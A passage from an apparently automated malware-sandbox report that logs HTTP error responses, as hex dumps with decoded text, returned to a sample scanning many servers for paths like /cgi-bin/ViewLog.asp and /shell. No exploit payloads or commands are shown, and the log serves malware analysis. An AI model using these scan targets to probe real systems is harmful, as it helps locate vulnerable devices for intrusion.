server.</p></body></html>HTTP/1.1 400 Bad RequestDate: Sun, 23 Oct 2022 15:58:06 GM
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Sun, 23 Oct 2022 15:58:06 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingContent-Encoding: gzipData Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 56 70 cb 2f 4a ca 4c 49 49 cd b3 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 6d 78 95 8e 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6a(HML),I310Vp/JLII&T";Ct@}4l"(//=3YNf>%mx0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 23 Oct 2022 15:58:06 GMTServer: ApacheX-XSS-Protection: 1; mode=blockX-Frame-Options: SAMEORIGINX-Content-Type-Options: nosniffContent-Length: 217Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /cgi-bin/ViewLog.asp was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 23 Oct 2022 15:58:05 GMTServer: WebsX-Frame-Options: SAMEORIGINCache-Control: no-cacheContent-Length: 166Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: Keep-AliveKeep-Alive: timeout=5, max=100content-type: text/htmllast-modified: Thu, 12 May 2022 16:22:07 GMTetag: "999-627d342f-ea22c98edc5005ae;gz"accept-ranges: bytescontent-encoding: gzipvary: Accept-Encodingcontent-length: 1159date: Sun, 23 Oct 2022 15:58:06 GMTserver: LiteSpeedplatform: hostingerData Raw: 1f 8b 08 00 00 00 00 00 00 03 85 56 6d 8f db 36 0c fe 9e 5f a1 ba 1f 92 6c b6 e5 dc f5 35 b1 b3 f5 75 18 b0 f5 06 f4 0a 74 b8 1d 06 46 62 6c f6 64 c9 95 94 4b b2 5e ff fb 20 3b 6f f7 92 cd 80 62 8b 7c 48 51 0f 45 2a f9 a3 b7 67 6f ce ff fc e3 1d ab 7c ad a6 bd 3c bc 98 02 5d 16 11 ea 64 e1 22 d6 58 9c d3 aa 88 84 d1 1e b5 1f b3 ca fb 66 cc 79 b3 b0 2a 35 b6 e4 d6 39 3e 4a 33 5e 1b b9 50 e8 f8 06 c8 99 14 f7 c1 52 70 8f b6 76 9c cd 0d cc 77 fa 55 ad b4 4b 85 a9 79 10 f3 2c 1d 71 66 ca 9d da 94 4d 5a 23 d7 ee 31 b3 72 ee 76 f2 e5 72 99 2e 4f 5b c7 27 59 96 f1 6c c4 ad 9c 27 4e 54 58 c3 63 e6 c8 ec 43 08 86 2d 32 48 5b 57 e1 c3 1f d1 fb 75 83 01 72 65 8e ad f6 84 67 27 3c e8 b9 30 16 1f b3 95 93 47 90 23 fe f9 f7 df 3e 76 31 45 d3 5e 2f af 10 e4 b4 c7 18 63 79 8d 1e 5a ab 04 bf 2e e8 ba 88 de 74 ec 25 e7 eb 06 23 b6 e1 b2 88 3c ae 3c 0f c9 99 30 51 81 75 e8 8b 4f e7 ef 93 17 d1 c6 8f f3 6b 85 2c 44 bd c1 0a e7 36 ba f0 fc bc 31 62 51 67 35 d9 69 2e 74 f9 d7 58 28 03 57 97 f1 a1 30 b9 27 93 e0 21 79 48 b1 7a 48 9a 6e 65 07 a2 3d f0 36 ae 22 89 63 6d fc 60 3b 49 40 53 0d 1e 87 ec db 0e 18 1e 49 ae 51 b0 1e 33 6d 34 b2 47 54 37 c6 7a d0 7e bf 9d ef bd dd 67 d8 d8 dc d8 fa 98 8f 99 32 e2 ea 41 cb 10 c6 26 82 c4 55 74 d7 c3 35 39 9a 91 22 bf 1e b3 8a a4 44 fd 1f 5e 44 65 ec 1d fb c6 38 f2 64 f4 98 c1 cc 19 b5 f0 78 68 df a6 93 b7 f9 3c 76 46 3e 27 9f 5e 25 6f 4c dd 80 a7 99 3a 3c 26 bf be 2b 50 96 18 1d 5a 6a a8 b1 88 ae 09 97 81 ad 03 f0 92 a4 af 0a 89 d7 24 30 69 27 31 23 4d 9e 40 25 4e 80 c2 62 b4 75 e4 c9 2b 9c 9e 99 c6 c5 cc 99 1a 7d 45 ba 64 ca 38 9f f3 4e 77 6f 41 89 4e 58 6a c2 46 0f d6 ec 5c 28 63 ae 1c 53 74 85 cc 57 c8 1a 28 91 91 6b fd a5 ec a3 07 eb d9 da 2c 2c 5b e2 cc 91 47 66 74 8b 13 15 42 93 6e 63 52 a4 af 58 8d 92 a0 88 40 a9 88 59 54 45 d4 12 e7 2a 44 1f b1 ca e2 bc 88 78 e5 a5 11 ee 6f b4 d6 d8 8e d8 74 5f 1d 9d 9b 23 a6 81 74 37 e6 bc 86 95 90 3a 9d 19 e3 9d b7 d0 84 49 68 56 3b 01 3f 4d 4f d3 e7 a1 e8 f6 b2 b4 26 7d 6f a1 db 7e e7 46 7b 97 96 c6 94 0a a1 a1 ae 03 0a e7 7e 9a 43 4d 6a 5d 9c 35 a8 7f fc 08 da 8d 4f b3 2c 3e cd 32 8a 9f 64 59 18 14 3f cb b2 30 28 7e 9e 65 61 50 fc 22 cb c2 a0 fb 4c 4c 7b 9b 2e d1 66 64 df 16 06 f3 85 16 21 43 03 8a 5d 6c e2 32 b6 31 c4 f5 f0 1b 5d f4 7f 69 a3 7a a5 41 ad 3d 09 77 36 fb 82 c2 f7 2f 0b 3b a1 0b 7b 59 84 9f 9b 9b 9d fd f0 f6 11 6f 9d 07 48 fa b5 e8 5e 37 37 17 97 c3 b4 59 b8 6a 00 b6 5c d4 a8 bd 1b 7e 8f 5b a5 2a 46 3f 68 5c b2 b7 e0 71 30 9c 40 e1 52 61 11 3c be 53 18 80 03 33 8c 6f b9 af 0b 97 96 e8 37 6a f7 7a 7d 0e e5 07 a8 71 60 86 17 d9 e5 04 52 70 6b 2d 8a d1 04 52 67 45 51 4e ea b4 01 8b da 7f 30 12 53 d2 0e ad 7f 8
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: Keep-AliveKeep-Alive: timeout=5, max=100content-type: text/htmllast-modified: Mon, 23 May 2022 14:11:42 GMTetag: "999-628b961e-43785a3ac3e8214e;gz"accept-ranges: bytescontent-encoding: gzipvary: Accept-Encodingcontent-length: 1159date: Sun, 23 Oct 2022 15:58:06 GMTserver: LiteSpeedplatform: hostingerData Raw: 1f 8b 08 00 00 00 00 00 00 03 85 56 6d 8f db 36 0c fe 9e 5f a1 ba 1f 92 6c b6 e5 dc f5 35 b1 b3 f5 75 18 b0 f5 06 f4 0a 74 b8 1d 06 46 62 6c f6 64 c9 95 94 4b b2 5e ff fb 20 3b 6f f7 92 cd 80 62 8b 7c 48 51 0f 45 2a f9 a3 b7 67 6f ce ff fc e3 1d ab 7c ad a6 bd 3c bc 98 02 5d 16 11 ea 64 e1 22 d6 58 9c d3 aa 88 84 d1 1e b5 1f b3 ca fb 66 cc 79 b3 b0 2a 35 b6 e4 d6 39 3e 4a 33 5e 1b b9 50 e8 f8 06 c8 99 14 f7 c1 52 70 8f b6 76 9c cd 0d cc 77 fa 55 ad b4 4b 85 a9 79 10 f3 2c 1d 71 66 ca 9d da 94 4d 5a 23 d7 ee 31 b3 72 ee 76 f2 e5 72 99 2e 4f 5b c7 27 59 96 f1 6c c4 ad 9c 27 4e 54 58 c3 63 e6 c8 ec 43 08 86 2d 32 48 5b 57 e1 c3 1f d1 fb 75 83 01 72 65 8e ad f6 84 67 27 3c e8 b9 30 16 1f b3 95 93 47 90 23 fe f9 f7 df 3e 76 31 45 d3 5e 2f af 10 e4 b4 c7 18 63 79 8d 1e 5a ab 04 bf 2e e8 ba 88 de 74 ec 25 e7 eb 06 23 b6 e1 b2 88 3c ae 3c 0f c9 99 30 51 81 75 e8 8b 4f e7 ef 93 17 d1 c6 8f f3 6b 85 2c 44 bd c1 0a e7 36 ba f0 fc bc 31 62 51 67 35 d9 69 2e 74 f9 d7 58 28 03 57 97 f1 a1 30 b9 27 93 e0 21 79 48 b1 7a 48 9a 6e 65 07 a2 3d f0 36 ae 22 89 63 6d fc 60 3b 49 40 53 0d 1e 87 ec db 0e 18 1e 49 ae 51 b0 1e 33 6d 34 b2 47 54 37 c6 7a d0 7e bf 9d ef bd dd 67 d8 d8 dc d8 fa 98 8f 99 32 e2 ea 41 cb 10 c6 26 82 c4 55 74 d7 c3 35 39 9a 91 22 bf 1e b3 8a a4 44 fd 1f 5e 44 65 ec 1d fb c6 38 f2 64 f4 98 c1 cc 19 b5 f0 78 68 df a6 93 b7 f9 3c 76 46 3e 27 9f 5e 25 6f 4c dd 80 a7 99 3a 3c 26 bf be 2b 50 96 18 1d 5a 6a a8 b1 88 ae 09 97 81 ad 03 f0 92 a4 af 0a 89 d7 24 30 69 27 31 23 4d 9e 40 25 4e 80 c2 62 b4 75 e4 c9 2b 9c 9e 99 c6 c5 cc 99 1a 7d 45 ba 64 ca 38 9f f3 4e 77 6f 41 89 4e 58 6a c2 46 0f d6 ec 5c 28 63 ae 1c 53 74 85 cc 57 c8 1a 28 91 91 6b fd a5 ec a3 07 eb d9 da 2c 2c 5b e2 cc 91 47 66 74 8b 13 15 42 93 6e 63 52 a4 af 58 8d 92 a0 88 40 a9 88 59 54 45 d4 12 e7 2a 44 1f b1 ca e2 bc 88 78 e5 a5 11 ee 6f b4 d6 d8 8e d8 74 5f 1d 9d 9b 23 a6 81 74 37 e6 bc 86 95 90 3a 9d 19 e3 9d b7 d0 84 49 68 56 3b 01 3f 4d 4f d3 e7 a1 e8 f6 b2 b4 26 7d 6f a1 db 7e e7 46 7b 97 96 c6 94 0a a1 a1 ae 03 0a e7 7e 9a 43 4d 6a 5d 9c 35 a8 7f fc 08 da 8d 4f b3 2c 3e cd 32 8a 9f 64 59 18 14 3f cb b2 30 28 7e 9e 65 61 50 fc 22 cb c2 a0 fb 4c 4c 7b 9b 2e d1 66 64 df 16 06 f3 85 16 21 43 03 8a 5d 6c e2 32 b6 31 c4 f5 f0 1b 5d f4 7f 69 a3 7a a5 41 ad 3d 09 77 36 fb 82 c2 f7 2f 0b 3b a1 0b 7b 59 84 9f 9b 9b 9d fd f0 f6 11 6f 9d 07 48 fa b5 e8 5e 37 37 17 97 c3 b4 59 b8 6a 00 b6 5c d4 a8 bd 1b 7e 8f 5b a5 2a 46 3f 68 5c b2 b7 e0 71 30 9c 40 e1 52 61 11 3c be 53 18 80 03 33 8c 6f b9 af 0b 97 96 e8 37 6a f7 7a 7d 0e e5 07 a8 71 60 86 17 d9 e5 04 52 70 6b 2d 8a d1 04 52 67 45 51 4e ea b4 01 8b da 7f 30 12 53 d2 0e ad 7f 8
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sun, 23 Oct 2022 15:58:06 GMTServer: ApacheContent-Length: 221Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 0a 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access /cgi-bin/ViewLog.aspon this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: gSOAP/2.7Content-Length: 0Connection: close
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: CPE-SERVER/1.0 Supports only GET
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 23 Oct 2022 15:58:07 GMTServer: Apache/2.4.6 (CentOS)Content-Length: 203Keep-Alive: timeout=15, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 73 68 65 6c 6c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /shell was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sun, 23 Oct 2022 15:58:07 GMTServer: Apache/2.4.7 (Ubuntu)Content-Length: 281Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 2f 73 68 65 6c 6c 0a 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 37 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 32 37 2e 30 2e 30 2e 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access /shellon this server.</p><hr><address>Apache/2.4.7 (Ubuntu) Server at 127.0.0.1 Port 80</address></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 23 Oct 2022 15:58:08 GMTContent-Type: text/htmlContent-Length: 33933Connection: keep-aliveETag: "5bbcbdc9-848d"
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/html; charset=utf-8Content-Length: 106Set-Cookie: JSESSIONID=deleted; Expires=Thu, 01 Jan 1970 00:00:01 GMT; Path=/; HttpOnlyConnection: closeData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 23 Oct 2022 15:58:05 GMTServer: ApacheVary: Accept-Encoding,User-AgentContent-Encoding: gzipContent-Length: 36Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=UTF-8Data Raw: 1f 8b 08 00 00 00 00 00 00 03 73 cb cc 49 55 c8 cb 2f 51 48 cb 2f cd 4b d1 e3 02 00 2b 90 a9 21 10 00 00 00 48 54 54 50 2f 31 2e 31 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 33 20 4f 63 74 20 32 30 32 32 20 31 35 3a 35 38 3a 30 35 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 33 34 37 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: sIU/QH/K+!HTTP/1.1 400 Bad RequestDate: Sun, 23 Oct 2022 15:58:05 GMTServer: ApacheContent-Length: 347Connection: closeContent-Type: text/html; charset=iso-8859-1<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><p>Additionally, a 400 Bad Requesterror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 23 Oct 2022 17:50:39 GMTServer: WebsX-Frame-Options: SAMEORIGINCache-Control: no-cacheContent-Length: 166Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: micro_httpdCache-Control: no-cacheDate: Mon, 02 Jan 2012 10:35:43 GMTContent-Type: text/htmlConnection: closeData Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 63 63 39 39 39 39 22 3e 3c 48 34 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 34 3e 0a 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a 3c 48 52 3e 0a 3c 41 44 44 52 45 53 53 3e 3c 41 20 48 52 45 46 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 61 63 6d 65 2e 63 6f 6d 2f 73 6f 66 74 77 61 72 65 2f 6d 69 63 72 6f 5f 68 74 74 70 64 2f 22 3e 6d 69 63 72 6f 5f 68 74 74 70 64 3c 2f 41 3e 3c 2f 41 44 44 52 45 53 53 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY BGCOLOR="#cc9999"><H4>404 Not Found</H4>File not found.<HR><ADDRESS><A HREF="http://www.acme.com/software/micro_httpd/">micro_httpd</A></ADDRESS></BODY></HTML>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: Date: Sun, 23 Oct 2022 15:58:10 GMTContent-Type: text/htmlContent-Length: 3318Connection: keep-aliveVary: Accept-EncodingETag: "5f7c849f-cf6"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 39 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 2c 68 65 6c 76 65 74 69 63 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 6c 69 6e 6b 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 76 69 73 69 74 65 64 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 61 3a 68 6f 76 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 35 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 36 65 6d 20 32 65 6d 20 30 2e 34 65 6d 3b 0a 20 20 